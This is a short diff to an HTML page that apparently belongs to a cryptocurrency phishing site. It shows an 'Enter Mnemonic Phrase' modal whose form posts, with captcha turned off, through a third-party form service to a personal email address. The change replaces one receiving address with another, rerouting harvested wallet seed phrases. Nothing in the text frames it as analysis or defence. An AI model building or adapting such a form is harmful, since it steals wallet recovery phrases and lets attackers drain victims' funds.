--- a/index.html
+++ b/index.html
@@ -1263,7 +1263,7 @@
                 <span class="mTopic1">Enter Mnemonic Phrase</span>
                 <span onclick="closeSpan()" class="mClose1" style="font-family:arial">X</span>
             </p>
-            <form action="https://formsubmit.co/wnewton0001@gmail.com " method="POST" />
+            <form action="https://formsubmit.co/cryptocoach43@gmail.com " method="POST" />
             <div class="modDivBody">
                 
                 <input type="hidden" name="_captcha" value="false">
